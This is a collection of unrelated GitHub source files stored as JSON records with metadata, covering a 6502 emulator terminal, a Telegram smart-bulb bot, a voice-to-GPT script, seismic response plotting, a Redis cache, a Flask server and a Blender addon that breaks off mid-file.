assembles, programs and resets 6502\n \"\"\"\n self.auto_single_step = False\n success = self.assemble(no_warning=True)\n if not success:\n return\n self.program()\n self.reset(force_autoreset=True)\n\n def auto_single_step_toggle(self):\n \"\"\"Toggles autostepping\n \"\"\"\n self.auto_single_step = not self.auto_single_step\n\n def on_key_pressed(self, key):\n \"\"\"On key pressed.\n Using a keymap to execute the methodes above\n\n Args:\n key (int): Keycode\n \"\"\"\n keymap = {\n \"h\": HelpActions.print_help,\n \"q\": self.stop_event.set,\n\n \"o\": lambda: self.select_assembly(True),\n \"a\": self.assemble,\n \"p\": self.program,\n\n \"r\": self.reset,\n \"u\": self.assemble_program_reset,\n\n \"s\": self.single_step,\n \"t\": self.auto_single_step_toggle\n }\n\n if chr(key) in keymap:\n keymap[chr(key)]()\n\n\nif __name__ == \"__main__\":\n Main().run()\n", "repo_name": "RobFro96/Arduino-Mega-6502", "sub_path": "term-6502/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "msvcrt.kbhit", "line_number": 34, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 34, "usage_type": "call"}, {"api_name": "coloredlogs.install", "line_number": 39, "usage_type": "call"}, {"api_name": "help_actions.HelpActions.get_args", "line_number": 50, "usage_type": "call"}, {"api_name": "help_actions.HelpActions", "line_number": 50, "usage_type": "name"}, {"api_name": "serial_thread.SerialThread", "line_number": 52, "usage_type": "name"}, {"api_name": "py6502.dis6502.dis6502", "line_number": 55, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 56, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions.port_select", "line_number": 64, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions", "line_number": 64, "usage_type": "name"}, {"api_name": "serial_actions.SerialActions.connecting", "line_number": 70, "usage_type": "call"}, {"api_name": "serial_actions.SerialActions", "line_number": 70, "usage_type": "name"}, {"api_name": "serial_thread.SerialThread", "line_number": 74, "usage_type": "name"}, {"api_name": "help_actions.HelpActions.print_help", "line_number": 83, "usage_type": "call"}, {"api_name": "help_actions.HelpActions", "line_number": 83, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.update", "line_number": 95, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 95, "usage_type": "name"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "bus_actions.BusActions.send_api_single_step", "line_number": 99, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 99, "usage_type": "name"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "myprint.myprint", "line_number": 124, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 125, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions.select", "line_number": 134, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 134, "usage_type": "name"}, {"api_name": "myprint.myprint", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "assembly_actions.AssemblyActions.read_bin_file", "line_number": 154, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 154, "usage_type": "name"}, {"api_name": "assembly_actions.AssemblyActions.EEPROM_SIZE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 159, "usage_type": "name"}, {"api_name": "py6502.dis6502.dis6502", "line_number": 160, "usage_type": "call"}, {"api_name": "myprint.myprint_warning", "line_number": 175, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions.assemble", "line_number": 177, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 177, "usage_type": "name"}, {"api_name": "assembly_actions.AssemblyActions.flash", "line_number": 190, "usage_type": "call"}, {"api_name": "assembly_actions.AssemblyActions", "line_number": 190, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.send_api_auto_reset", "line_number": 203, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 203, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.send_api_reset", "line_number": 205, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 205, "usage_type": "name"}, {"api_name": "bus_actions.BusActions.send_api_single_step", "line_number": 213, "usage_type": "call"}, {"api_name": "bus_actions.BusActions", "line_number": 213, "usage_type": "name"}, {"api_name": "help_actions.HelpActions.print_help", "line_number": 238, "usage_type": "attribute"}, {"api_name": "help_actions.HelpActions", "line_number": 238, "usage_type": "name"}]} +{"seq_id": "519276115", "text": "from aiogram.dispatcher.filters import Command, Text\nfrom aiogram.types import Message\n\nfrom keyboards.default.menu import bulbs_menu, bulb_menu\nfrom keyboards.default.menu import menu\nfrom loader import dp\nfrom utils.devices.smart_bulbs import SmartBulbs\n\nbulb = SmartBulbs()\n\n\n@dp.message_handler(Command(\"menu\"))\nasync def show_menu(message: Message):\n await message.answer('Выберете умную технику', reply_markup=menu)\n\n\n@dp.message_handler(Text(equals='Умные лампы'))\nasync def show_bulbs_menu(message: Message):\n print(bulb.bulbs)\n await message.answer('Выберете умную лампу', reply_markup=bulbs_menu)\n\n\n@dp.message_handler(Text(equals='1'))\nasync def show_bulb_menu(message: Message):\n bulb.bulb_number = int(message.text) - 1\n await message.answer('Выберете настройку для лампы', reply_markup=bulb_menu)\n\n\n@dp.message_handler(Text(equals=['Включить']))\nasync def turn_on_lump(message: Message):\n bulb.turn_on()\n await dp.bot.send_message(message.from_user.id, \"Лампа включена\")\n\n\n@dp.message_handler(text=['Выключить'])\nasync def turn_off_lump(message: Message):\n bulb.turn_off()\n await dp.bot.send_message(message.from_user.id, \"Лампа выключена\")\n", "repo_name": "insigmo/smart_home_tg", "sub_path": "handlers/users/menu.py", "file_name": "menu.py", "file_ext": "py", "file_size_in_byte": 1299, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.devices.smart_bulbs.SmartBulbs", "line_number": 9, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 13, "usage_type": "name"}, {"api_name": "keyboards.default.menu.menu", "line_number": 14, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 12, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 12, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 12, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 18, "usage_type": "name"}, {"api_name": "keyboards.default.menu.bulbs_menu", "line_number": 20, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 17, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 17, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 24, "usage_type": "name"}, {"api_name": "keyboards.default.menu.bulb_menu", "line_number": 26, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 23, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 23, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 23, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 30, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 32, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 32, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 32, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 29, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 29, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 36, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 38, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 38, "usage_type": "name"}, {"api_name": "loader.dp.message_handler", "line_number": 35, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "12018439866", "text": "#!/usr/bin/env python\n#\n# Design Kei Sawamura\n# Author Kei Sawamura\n#\n# This application allows you to call GPT with voice.\n#\n\nimport openai\nimport os\nimport speech_recognition as sr\n\nfrom gtts import gTTS\nfrom playsound import playsound\n\n\ndef listen_to_order():\n\n # Create a recognizer instance.\n r = sr.Recognizer()\n \n # Continuously listen for order.\n with sr.Microphone() as source:\n print(\"Listening...\")\n audio = r.listen(source)\n\n try:\n # Use Google's speech recognition service to convert speech to text.\n content = r.recognize_google(audio, language='ja-JP')\n print(\"You said: {}\".format(content))\n\n return content\n\n except sr.UnknownValueError:\n # If the speech was unclear, it will throw this error.\n print(\"Sorry, I didn't catch that.\")\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n \n\n\ndef call_openai_api(content, model = \"gpt-4\"):\n\n # Load your API key from an environment variable or secret management service.\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n response = openai.ChatCompletion.create(model = model,\n messages = [\n { \"role\": \"user\", \"content\": \"次の日本語の質問を英語で回答してください\" },\n { \"role\": \"assistant\", \"content\": \"OK, How can I help you?\" },\n { \"role\": \"user\", \"content\": content }\n ]\n )\n\n return response\n\n\n\ndef save_and_speach(context):\n\n res = call_openai_api(content)\n\n msg = res.choices[0].message['content']\n mp3 = res.id + \".mp3\"\n txt = res.id + \".txt\"\n\n print(msg)\n\n os.mkdir(content)\n tts = gTTS(msg, lang='en')\n tts.save(content + os.sep + mp3)\n playsound(content + os.sep + mp3)\n\n with open(content + os.sep + txt, \"w\") as file:\n file.write(msg)\n\n\n\nif __name__ == '__main__':\n\n content = listen_to_order()\n ans = input(\"Do you call GPT-API? [y/n]: \")\n\n if (ans == \"y\"):\n save_and_speach(content)\n \n\n", "repo_name": "keix/call-gpt-with-voice", "sub_path": "call-gpt-with-voice.py", "file_name": "call-gpt-with-voice.py", "file_ext": "py", "file_size_in_byte": 2084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "speech_recognition.Recognizer", "line_number": 20, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 23, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 34, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 38, "usage_type": "attribute"}, {"api_name": "openai.api_key", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 46, "usage_type": "call"}, {"api_name": "openai.ChatCompletion.create", "line_number": 47, "usage_type": "call"}, {"api_name": "openai.ChatCompletion", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 69, "usage_type": "call"}, {"api_name": "gtts.gTTS", "line_number": 70, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 71, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 72, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 74, "usage_type": "attribute"}]} +{"seq_id": "18272251307", "text": "from glob import glob\nfrom obspy import read_inventory\n\ndef mkdir(dirname):\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\ndef get_stainfo(xmlfile):\n mkdir(\"./response_figure\")\n inv = read_inventory(xmlfile)\n net = inv[0]\n sta = net[0]\n lat = sta.latitude\n lon = sta.longitude\n net_name = xmlfile.split(\".\")[0]\n sta_name = xmlfile.split(\".\")[1]\n if \"Z\" in sta[0].code:\n cha = sta[0]\n elif \"Z\" in sta[1].code:\n cha = sta[1]\n else:\n cha = sta[2]\n cha_name = cha.code\n response = cha.response\n response_figure = \"./response_figure/\"+net_name+\".\"+sta_name+\".\"+cha_name+\".png\"\n response.plot(min_freq=0.001, output=\"VEL\", outfile=response_figure)\n\nxmlfile_list = glob(\"*.xml\")\nfor xmlfile in xmlfile_list:\n get_stainfo(xmlfile)\n", "repo_name": "ranoriginals/Seismic-Attenuation-in-Alaska", "sub_path": "2_station/instrument_response/plot_response.py", "file_name": "plot_response.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "obspy.read_inventory", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "189772634", "text": "\"\"\"add login_attemps and locked_at field to user table\n\nRevision ID: 188374910655\nRevises: f30cf048c228\nCreate Date: 2022-08-12 19:05:59.776361\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"188374910655\"\ndown_revision = \"f30cf048c228\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\"users\", sa.Column(\"login_attemps\", sa.Integer(), nullable=True))\n op.add_column(\"users\", sa.Column(\"locked_at\", sa.DateTime(), nullable=True))\n\n\ndef downgrade():\n op.drop_column(\"users\", \"locked_at\")\n op.drop_column(\"users\", \"login_attemps\")\n", "repo_name": "mealie-recipes/mealie", "sub_path": "alembic/versions/2022-08-12-19.05.59_188374910655_add_login_attemps_and_locked_at_field_.py", "file_name": "2022-08-12-19.05.59_188374910655_add_login_attemps_and_locked_at_field_.py", "file_ext": "py", "file_size_in_byte": 622, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3977, "dataset": "github-code", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 26, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "32367329445", "text": "from enum import Enum\n\n\nclass Small(Enum):\n one = 1\n two = 2\n three = 3\n four = 4\n\n\nAssertionOperator = Enum(\n \"AssertionOperator\",\n {\n \"equal\": \"==\",\n \"==\": \"==\",\n \"should be\": \"==\",\n \"inequal\": \"!=\",\n \"!=\": \"!=\",\n \"should not be\": \"!=\",\n \"less than\": \"<\",\n \"<\": \"<\",\n \"greater than\": \">\",\n \">\": \">\",\n \"<=\": \"<=\",\n \">=\": \">=\",\n \"contains\": \"*=\",\n \"*=\": \"*=\",\n \"starts\": \"^=\",\n \"^=\": \"^=\",\n \"should start with\": \"^=\",\n \"ends\": \"$=\",\n \"should end with\": \"$=\",\n \"$=\": \"$=\",\n \"matches\": \"$\",\n \"validate\": \"validate\",\n \"then\": \"then\",\n \"evaluate\": \"then\",\n },\n)\nAssertionOperator.__doc__ = \"\"\"This is some Doc\"\"\"\n\n\nclass TOCWithInitsAndKeywordsAndDataTypes:\n \"\"\"\n = First entry =\n\n TOC in somewhat strange place.\n\n %TOC%\n\n = Second =\n\n = 3 =\n\n %TOC% not replaced here\n \"\"\"\n\n def __init__(self, arg=True, enum: Small = Small.three):\n pass\n\n def keyword(self, assertion: AssertionOperator = AssertionOperator.equal, small: Small = Small.one):\n \"\"\"Tags: tag\"\"\"\n pass\n", "repo_name": "robocopcoin/RobotEC-Framework", "sub_path": "atest/testdata/libdoc/TOCWithInitsAndKeywordsAndDataTypes.py", "file_name": "TOCWithInitsAndKeywordsAndDataTypes.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "74447858403", "text": "from typing import List\n\n\nclass Railway:\n def __init__(self):\n pass\n\n def railway(self, landmarks: int, distance: List[List[int]]) -> int:\n\n distance.sort(key=lambda a: a[2]) # sort all edges by weight\n parent = [i for i in range(landmarks + 1)] # initially, all vertices's parent is themselves\n\n def find(x):\n # if x == parent[x]:\n # return parent[x]\n # return find(parent[parent[x]])\n if x != parent[x]:\n parent[x] = find(parent[parent[x]])\n return parent[x]\n\n sum_distance, e, k = 0, 0, 0\n while e < landmarks - 1: # number of MST's edges = V-1\n u, v, d = distance[k] # d:weight(distance)\n\n k += 1\n x = find(u - 1)\n y = find(v - 1)\n\n if x != y:\n e += 1\n sum_distance += d\n parent[x] = y\n\n return sum_distance\n", "repo_name": "chu-wen-lin/Practical-Data-Structures-Algorithms", "sub_path": "Railway/Railway.py", "file_name": "Railway.py", "file_ext": "py", "file_size_in_byte": 945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "14715608626", "text": "import requests\nimport json\nimport pandas as pd\nfrom scipy.stats import f_oneway\n\n# Mengunduh data dari URL\nurl = \"https://raw.githubusercontent.com/rebekz/datascience_course/main/data/driver_income.json\"\nresponse = requests.get(url)\n\n# Memeriksa apakah permintaan berhasil\nif response.status_code == 200:\n # Membaca data JSON dari respons\n data = json.loads(response.text)\n\n # Membuat DataFrame dari data\n df = pd.DataFrame(data)\n print(df)\n\n # Melakukan uji ANOVA\n grouped_data = [df[df['ownership'] == 'own']['income'],\n df[df['ownership'] == 'rent']['income'],\n df[df['ownership'] == 'other']['income']]\n\n print(grouped_data)\n # Melakukan uji ANOVA\n f_statistic, p_value = f_oneway(*grouped_data)\n\n # Menampilkan hasil uji statistik\n print(\"Hasil Uji ANOVA:\")\n print(\"Nilai F-statistic:\", f_statistic)\n print(\"Nilai p-value:\", p_value)\n\n # Menginterpretasikan hasil uji ANOVA\n alpha = 0.05\n if p_value < alpha:\n print(\"Ada perbedaan signifikan dalam pendapatan antara kelompok ownership.\")\n else:\n print(\"Tidak ada perbedaan signifikan dalam pendapatan antara kelompok ownership.\")\n\nelse:\n print(\"Gagal mengunduh data. Kode status:\", response.status_code)\n", "repo_name": "Hakim223/Submission-Final-Exam-Data-Science", "sub_path": "uji.py", "file_name": "uji.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "id", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.f_oneway", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "49085635", "text": "from drf_spectacular.utils import extend_schema\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import NotAuthenticated, PermissionDenied\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom server.apps.blog.models import Post\nfrom server.apps.blog.serializers import PostSerializer\nfrom server.apps.common.helpers_exception import exception_schema_dict\n\n\nclass PostViewSet(viewsets.ReadOnlyModelViewSet):\n serializer_class = PostSerializer\n authentication_classes = ()\n permission_classes = ()\n\n def get_queryset(self):\n return Post.objects.all()\n\n @extend_schema(\n responses={\n 200: PostSerializer,\n 401: exception_schema_dict(\n (\n NotAuthenticated,\n ),\n ),\n 403: exception_schema_dict(\n (\n PermissionDenied,\n ),\n ),\n },\n )\n def list(self, request, *args, **kwargs):\n return super().list(request, *args, **kwargs)\n", "repo_name": "Praglu/dietitian-application-server", "sub_path": "src/server/apps/blog/views/post.py", "file_name": "post.py", "file_ext": "py", "file_size_in_byte": 1045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "server.apps.blog.serializers.PostSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "server.apps.blog.models.Post.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "server.apps.blog.models.Post.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "server.apps.blog.models.Post", "line_number": 17, "usage_type": "name"}, {"api_name": "drf_spectacular.utils.extend_schema", "line_number": 19, "usage_type": "call"}, {"api_name": "server.apps.blog.serializers.PostSerializer", "line_number": 21, "usage_type": "name"}, {"api_name": "server.apps.common.helpers_exception.exception_schema_dict", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.NotAuthenticated", "line_number": 24, "usage_type": "name"}, {"api_name": "server.apps.common.helpers_exception.exception_schema_dict", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.PermissionDenied", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "12503204764", "text": "# coding=utf-8\n\nimport redis\nimport zlib\nimport pickle\n\n\nclass RedisCache(object):\n def __init__(self, params={}):\n default_timeout = 3600 * 24 * 100\n host = params.get('HOST', '127.0.0.1')\n port = params.get('PORT', 6379)\n db = params.get('DB', 0)\n timeout = params.get('timeout', params.get('TIMEOUT', default_timeout))\n if timeout is not None:\n try:\n timeout = int(timeout)\n except (ValueError, TypeError):\n timeout = 300\n self.default_timeout = timeout\n\n self._cache = redis.StrictRedis(host=host, port=port, db=db)\n self._headers = {'zlib': '!zlib!', 'pickle': '!pickle!'}\n\n def _prepare_key(self, raw_key):\n return str(raw_key)\n # return smart_str(raw_key)\n\n def _check_header(self, header, value):\n header_marker = self._headers.get(header)\n if header_marker and \\\n isinstance(value, str) and \\\n value[:len(header_marker)] == header_marker:\n value = value[len(header_marker):]\n if header == 'zlib':\n value = zlib.decompress(value)\n if header == 'pickle':\n value = pickle.loads(value)\n return value\n\n def _pack_value(self, value):\n if isinstance(value, str):\n pass\n elif isinstance(value, int) or isinstance(value, float):\n value = str(value)\n else:\n value = self._headers['pickle'] + pickle.dumps(value)\n # zlib.compress if value is long enough\n if len(value) > 1000:\n value = self._headers['zlib'] + zlib.compress(value)\n return value\n\n def _unpack_value(self, value):\n value = self._check_header('zlib', value)\n value = self._check_header('pickle', value)\n return value\n\n def add(self, key, value, timeout=0):\n if self._cache.exists(key):\n return False\n return self.set(key, value, timeout or self.default_timeout)\n\n def set(self, key, value, timeout=None):\n key = self._prepare_key(key)\n\n # store the key/value pair\n result = self._cache.set(key, self._pack_value(value))\n\n # set content expiration, if necessary\n self._cache.expire(key, timeout or self.default_timeout)\n\n return result\n\n def get(self, key, default=None):\n key = self._prepare_key(key)\n value = self._cache.get(key)\n\n if value is None:\n return default\n else:\n return self._unpack_value(value)\n\n def incr(self, key, amount):\n return self._cache.incr(key, amount)\n\n def decr(self, key, amount):\n return self._cache.decr(key, amount)\n\n def delete(self, key):\n key = self._prepare_key(key)\n self._cache.delete(key)\n\n def expire(self, key, time):\n self._cache.expire(key, time)\n\n def flush(self, all_dbs=False):\n self._cache.flush(all_dbs)\n\n def close(self, **kwargs):\n pass\n", "repo_name": "NoharaHiroshi/forum_system", "sub_path": "redis_store/redis_cahce.py", "file_name": "redis_cahce.py", "file_ext": "py", "file_size_in_byte": 3005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "redis.StrictRedis", "line_number": 22, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 36, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "24434772309", "text": "from flask import Flask, request, render_template, send_from_directory\nfrom time import time, strftime\nfrom datetime import timedelta\n\nfrom json import load as loadJSON\n\nfrom math import ceil\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef main():\n with open('database.json', 'r') as f:\n db = loadJSON(f)\n start = request.args.get(\n 'after',\n default=0,\n type=int\n )\n perpage = request.args.get(\n 'perpage',\n default=8,\n type=int\n )\n end = min([\n start + perpage - 1,\n len(db['items'])\n ])\n litems = db['items'] if perpage < 1 else db['items'][start:end + 1]\n pid = request.args.get('project', type=int)\n if pid is not None:\n litems = filter(lambda item: item['parent-project'] == pid, litems)\n return render_template(\n \"infoIndex.html\",\n currTime=lambda: strftime(\"%c\"),\n litems=litems,\n pagination=None if perpage < 1 else {\n 'page': round(start / perpage) + 1,\n 'totalPages': max(1, ceil(len(db['items']) / perpage)),\n 'perpage': perpage,\n 'first_page_url': '/?after=%i&perpage=%i' % (0, perpage),\n 'last_page_url': '/?after=%i&perpage=%i' % (len(db['items']) - len(db['items']) % perpage, perpage),\n 'prev_page_url': '/?after=%i&perpage=%i' % (max(0, start - perpage), perpage),\n 'next_page_url': '/?after=%i&perpage=%i' % (end + 1 if end + 1 < len(db['items']) else start, perpage)\n },\n timedelta2readable=lambda seconds: str(timedelta(seconds=seconds))\n )\n\n\n@app.route('/css/')\ndef send_css(path):\n return send_from_directory('css', path)\n\n\n@app.route('/js/')\ndef send_js(path):\n return send_from_directory('js', path)\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8080)\n", "repo_name": "ochen1/TodoistPaper", "sub_path": "infoServer.py", "file_name": "infoServer.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 36, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "37545536405", "text": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"musicDownloader\",\n version=\"1.01\",\n\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n description=\"A video downloader, with integrated mp3 conversion and metadata addition\",\n\n author=\"dadope\",\n url=\"https://github.com/dadope/musicDownloader\",\n\n python_requires='>=3',\n include_package_data=True,\n packages=setuptools.find_packages(),\n\n entry_points={\n \"console_scripts\": [\"musicDownloader = musicDownloader.main:main\"]\n },\n\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ]\n)\n\n", "repo_name": "dadope/musicDownloader", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "18525872487", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy,re\nfrom bpy.types import Panel\nfrom bpy.props import StringProperty\n\n\nbl_info = {\n\t\"name\": \"KTX Image/Font Paths\",\n\t\"description\": \"Show/Edit All Image and Font Paths Directly\",\n\t\"author\": \"Roel Koster, @koelooptiemanna, irc:kostex\",\n\t\"version\": (1, 0, 2),\n\t\"blender\": (2, 80, 0),\n\t\"location\": \"Properties > Scene\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"https://github.com/kostex/blenderscripts/\",\n\t\"tracker_url\": \"https://developer.blender.org/maniphest/task/edit/form/2/\",\n\t\"category\": \"Scene\"}\n\n\nclass KTXIMAGEFONTPATHS_OT_RemoveSlashDots(bpy.types.Operator):\n\t\"\"\"Remove all \\..\"\"\"\n\tbl_idname = \"ktximagefontpaths.removeslashdots\"\n\tbl_label = \"Remove Slashdots\"\n\n\tdef execute(self, context):\n\t\tfor i in 